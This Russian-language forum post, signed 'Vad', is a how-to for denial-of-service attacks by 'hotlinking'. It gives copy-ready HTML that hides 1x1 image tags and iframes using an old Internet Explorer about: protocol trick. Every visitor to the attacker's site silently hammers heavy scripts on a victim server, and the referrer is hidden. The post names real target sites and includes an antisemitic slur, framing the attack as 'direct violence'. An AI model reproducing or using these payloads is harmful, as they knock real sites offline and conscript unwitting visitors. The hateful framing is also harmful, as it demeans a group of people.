Способ совершения прямого акта насилия против жЫдополицейских сил ( Пишет некто Vad ) Объясню популярно смысл хотлинка и способ его проведения через протокол about:
Хотлинк - это загрузка како-го либо файла с сервера жертвы на атакующем сервере
Для чего нужен хотлинк?
Для того, что бы создать нагрузку либо на канал атакуемого сервера либо на сам
сервер.
Есть 2 способа хотлинка:
a) Можно разместить на своих сайтах код, загружающий какую-то увесистую картинку
с сайта жертвы:
<img src=http://site.com/image.gif>.
Что бы не показывать эту картинку вашим серферам, проставим размеры в 1 пиксель:
<img src=http://site.com/image.gif width=1 height=1>
Для солидности, можем запретить показ картинки на вашей странице с помощью
стилей:
<img src=http://site.com/image.gif width=1 height=1 style=display:none>
При таком подходе каждый срефер, зашедший на ваш сайт, загрузит картинку с
атакуемого сервера, но не увидит ее.
Что имеем? Имеем загрузку канала атакуемого сервера. Траффик стоит денег,
соответсвенно у жертвы растут счета за хостинг. Если у жертвы канал не толстый,
то при большом количестве запросов произойдет пробка и к серверу пробиться
станет сложно. Но это не наш метод. Переходим к способу "б"
б) Запрашивать нужно не картинки а "тяжелые" скрипты. Скрипты, требующие
обращения к базам данных или больших вычислительных мощностей. Обычно на сайтах
типа КЦ скрипты не оптимизированны под большие нагрузки. Большое количество
запросов к таким скриптам загрузит процессор атакуемого сревера, забьет логами
жесткий диск и т.д. В результате сервер просто умрет, хотя канал до сервера
будет загружен не очень сильно.
Пример:
<img src=http://site.com/script.php width=1 height=1 style=display:none>
В таком варианте атакуемый сервер получает запрос на выполнение срипта и
выполняет его, но так, как запрашиваем мы через тег <img src>, а возвращаемый
результат не является картинкой, то на нашем сайте будет показана иконка "битой
картинки". Загнав эту иконку в 1х1 пиксель и прикрыв стилями
(style=display:none) мы избавим наших серферов от просмотра "битой" графики. Они
просто ничего не заметят :)
Для увеличения нагрузки на сервер можно хотлинковать сразу 5-10-20... скриптов.
Просто увеличиваем количество "картинок":
<img src=http://site.com/script1.php width=1 height=1 style=display:none>
<img src=http://site.com/script2.php width=1 height=1 style=display:none>
<img src=http://site.com/script3.php width=1 height=1 style=display:none>
.........
Лучше всего ставить эти код вниз своих страниц, что бы серферу не пришлось ждать
загрузки вашей информации. Он сперва получит то, за чем пришел и попутно дернет
жертву.
Подход всем хорош, за исключением того, что эти запросы могут быть обращены
против атакующего. При получении запроса к картинке или скрипту, сервер может
проверить поле HTTP_REFERRER и если в этом указано, что запрос пришел с
атакующего сайта, средиректить его обратно, на какой-либо из ваших собственных
скриптов. В итоге вы будете грузить сами себя.
Что бы этого не произошло мы несколько усложним конструкцию.
В IE имеется протокол "about:". Пример - ваша стартовая страница about:blank.
В версиях IE до XPSP2 и некоторых патчей для SP1 работает следущая фича:
При добавлении любого символа после двоеточия в about:, этот символ выводится на
странице.
например about:1 - выведет на странице единицу.
about:<script>alert()</script> - выведет в теле страницы код скрипта и исполнит
его.
about:<img src=http://site.com/image.gif> - выведет на странице картинку.
about:<img src=http://site.com/script1.php width=1 height=1 style=display:none>
- дернет скрипт на чужом сервере, создав нагрузку.
Самое главное: поле HTTP_REFERRER при этом останется пустым, т.к. выполняется
это всё на локальной машине. Соответсвенно вернуть вам ответку атакуемый не
сможет. Он будет видеть запросы, но источник атаки он не обнаружит.
И так доводим код до ума и вызываем протокол about: в ифрейме.
<iframe src="about:<img
src=http://chechenpress.info/forum/index.php?showtopic=156>" width=0 height=0>
Продублировав такой код 10 раз и изменив имена вызываемых скриптов вы заставите
каждого посетителя вашего сайта 10 раз дернуть вражеский сервер.
Хотлинковать лучше всего тяжелые скрипты, например топики на форумах
http://chechenpress.info/forum/ http://kavkazchat.com Просто скопируйте URL топиков в буфер обмена и замените нужные фрагменты кода.
P.s. Этот протокол пропатчен M$ примерно год назад. Эти конструкции будут
работать процентах на 40-50 машин, на тех, где не стоит SP2.
Остальные, пропатченные пользователи просто ничего не заметят.
Vad
(с)перто, нахуй, с
http://groups.yahoo.com/group/peace4peace/message/11